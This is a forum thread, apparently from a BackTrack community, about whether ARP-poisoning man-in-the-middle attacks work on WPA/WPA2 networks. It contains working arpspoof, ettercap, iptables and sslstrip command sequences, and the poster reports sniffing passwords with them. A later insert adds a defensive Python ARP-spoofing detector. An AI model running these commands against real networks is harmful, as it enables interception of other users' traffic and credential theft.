Is Arp-Poisoning MITM attack possible on WPA network?
Hi guys,
I've been piddling around with arp-poisoning using Ettercap-ng and Arpspoof along with Sslstrip and various Dsniff programs like urlsnarf, webspy, etc. I can successfully perform a MITM on my open network and on my network with WEP encryption enabled, but I would like to be able to do the same on it with WPA encryption enabled. (Obviously I know the passkey because it's my network.)
I was previously under the impression that it was difficult or impossible to perform an Arp Poisoning on a WPA encrypted network due to the fact that merely knowing the passkey is not sufficient to decrypt the packets because of the WPA handshake. Then I stumbled upon this thread "http://www.backtrack-linux.org/forums/old-newbie-area/24774-ettercap-wpa.html" which claimed that performing a mitm attack on a WPA network is done exactly the same as on an unencrypted network (no handshake or passkey stuff required as long as you're connected to the AP).
Incidentally, I have tried performing the attack just like on an unencrypted network (except I tried both Arpspoof and Ettercap-ng), but I end up DoSing both myself and my victim laptop.
So, my questions are:
1. Is the answer to this thread correct in saying that performing a MITM attack on a WPA is done the same as on an open network?
2. If the answer to question 1 is "yes", then what am I doing wrong? (I will post my commands if that is the case.)
Thanks in advance!
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Well, you're connected to the network, right? So yes.
Posting commands used is always good to allow people to see what you have tried.
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Ok, thanks. I appreciate the help. I'm fairly certain it's not a driver issue because, as I said before, aircrack-ng works fine. I am using Backtrack 4 running on a Dell Mini 9 with an Intel 5100 card.
Here are my commands. Obviously they are run as root.
Using Arpspoof:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -k -f -l 8080
arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1
Using Ettercap-NG:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -k -f -l 8080
ettercap -T -i wlan0 -Tq -M ARP // //
Also, for etter.conf I have changed ec_uid to 0 and ec_gid to 0. I did not uncomment the iptables line since I was using Sslstrip.
Thanks for the help! I really appreciate it.
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Ok, I figured it out. Thanks TAPE for clarifying that it's possible. For all those who may read this post in the future I would like to clarify:
Contrary to what some other sites say (I can't remember specifically, but I've read it somewhere), it is entirely possible to perform a MITM attack using Arpspoof (and probably Ettercap too, but I haven't got it to work yet) on a WPA or WPA2 encrypted network. I successfully used Arpspoof and Sslstrip to sniff passwords on my WPA2 network. I'm sure many, many people have done this before, but I had spent a long time trying to find out if it was even possible, which it is.
Just in case anyone is wondering what commands I used:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
cd /home/christopher/.sslstrip-0.7 # of course you will have to change this to your location
python sslstrip.py -k -f -l 8080
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Perhaps best to first try and single out a specific host with ettercap
Code:
ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Quote: Originally Posted by TAPE
Perhaps best to first try and single out a specific host with ettercap
Code:
ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
Also, rather than using the tools, learn how this sort of thing works. It is possible to hand generate our ARP packets and send them off. Less network traffic lets you learn what's going on and also reason out why things would be hurting a bit here.
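As an added example (not code from this thread or from the ettercap/arpspoof projects), the following script takes Gitsnik's advice from the defender's side: it parses raw Ethernet/ARP frames field by field and runs a small stateful monitor over them. This also illustrates the original question: WPA/WPA2-PSK only encrypts each client's link to the access point, and the AP bridges the decrypted frames between associated clients, so an associated client's forged ARP replies reach other clients exactly as on an open network, and the thing a defender can watch for is the same too, namely a trusted IP (here the gateway) suddenly answering from a different MAC and replies that nobody requested. The IP addresses mirror the ones in the thread; the MAC addresses, the pinned gateway binding and the three sample frames are constructed for the example.

```python
"""Flag ARP cache poisoning from Ethernet/ARP frames (offline, constructed input)."""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_frame(oper, sha, spa, tha, tpa):
    """Construct an Ethernet II frame carrying IPv4-over-Ethernet ARP.
    Only used to fabricate sample input for the monitor below."""
    eth_dst = b"\xff" * 6 if oper == ARP_REQUEST else mac_bytes(tha)
    eth = struct.pack("!6s6sH", eth_dst, mac_bytes(sha), ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper,
                      mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa))
    return eth + arp


def parse_arp_frame(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4/Ethernet ARP."""
    if len(frame) < 42:
        return None
    _, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "eth_src": mac_str(eth_src), "sha": mac_str(sha),
            "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpWatch:
    """Learns IP->MAC bindings and flags: a pinned binding being contradicted,
    a learned binding changing, an Ethernet source that disagrees with the ARP
    sender field, and replies that answer no outstanding request."""

    def __init__(self, trusted=None):
        self.trusted = dict(trusted or {})  # pinned bindings, e.g. the gateway
        self.learned = {}                   # first binding seen on the wire, per IP
        self.pending = set()                # (asker_ip, asked_ip) requests awaiting a reply

    def observe(self, frame: bytes):
        arp = parse_arp_frame(frame)
        if arp is None:
            return []
        alerts = []
        ip, mac = arp["spa"], arp["sha"]
        if arp["eth_src"] != mac:
            alerts.append(f"{ip}: ARP sender {mac} differs from Ethernet source {arp['eth_src']}")
        if arp["oper"] == ARP_REQUEST:
            self.pending.add((ip, arp["tpa"]))
        elif arp["oper"] == ARP_REPLY:
            key = (arp["tpa"], ip)
            if key in self.pending:
                self.pending.discard(key)
            else:  # legitimate gratuitous ARP exists, so treat this as a weak signal on its own
                alerts.append(f"{ip}: unsolicited ARP reply to {arp['tpa']} from {mac}")
        if ip in self.trusted:
            if self.trusted[ip] != mac:
                alerts.append(f"{ip}: pinned MAC {self.trusted[ip]} but frame claims {mac}")
        elif ip in self.learned:
            if self.learned[ip] != mac:  # first binding wins until an operator resets the monitor
                alerts.append(f"{ip}: binding changed from {self.learned[ip]} to {mac}")
        else:
            self.learned[ip] = mac
        return alerts


def demo():
    """Replay three constructed frames: a normal request/reply pair, then a forged reply
    that claims the gateway's IP from another MAC (what the thread's arpspoof command emits)."""
    gw, gw_mac = "192.168.1.1", "02:00:00:00:00:01"
    host, host_mac = "192.168.1.7", "02:00:00:00:00:07"
    rogue_mac = "02:00:00:00:00:99"
    watch = ArpWatch(trusted={gw: gw_mac})
    frames = [
        build_arp_frame(ARP_REQUEST, host_mac, host, "00:00:00:00:00:00", gw),
        build_arp_frame(ARP_REPLY, gw_mac, gw, host_mac, host),
        build_arp_frame(ARP_REPLY, rogue_mac, gw, host_mac, host),
    ]
    return [watch.observe(f) for f in frames]


if __name__ == "__main__":
    for i, alerts in enumerate(demo(), 1):
        print(f"frame {i}: {alerts or 'ok'}")
```

On a live network the same `ArpWatch.observe` loop would be fed from a raw socket or a pcap reader instead of `demo()`; pinning the gateway binding is the part that matters most, because a learned-only monitor cannot tell a poisoned first observation from a genuine one. The mismatch between the ARP sender field and the Ethernet source is checked separately because some spoofing tools set them consistently and some do not.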
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Thanks guys! Actually, I've got it working with Ettercap in the meantime using the same commands as on an unencrypted network. Sorry I'm so slow to post. Thanks for the help TAPE; I actually had set specific targets, I just typed it wrong in my post, but thanks for your time.
Also, Gitsnik, thanks for the tip, I'll look into making my own Arp packets. That sounds like a useful thing to know how to do. I really appreciate you guys.
I will mark this thread as solved.
Thanks!
edit: Actually, I can't figure out how to mark this thread as solved. If this is important please let me know how, otherwise I will assume that only the Admins can do that. Thanks guys.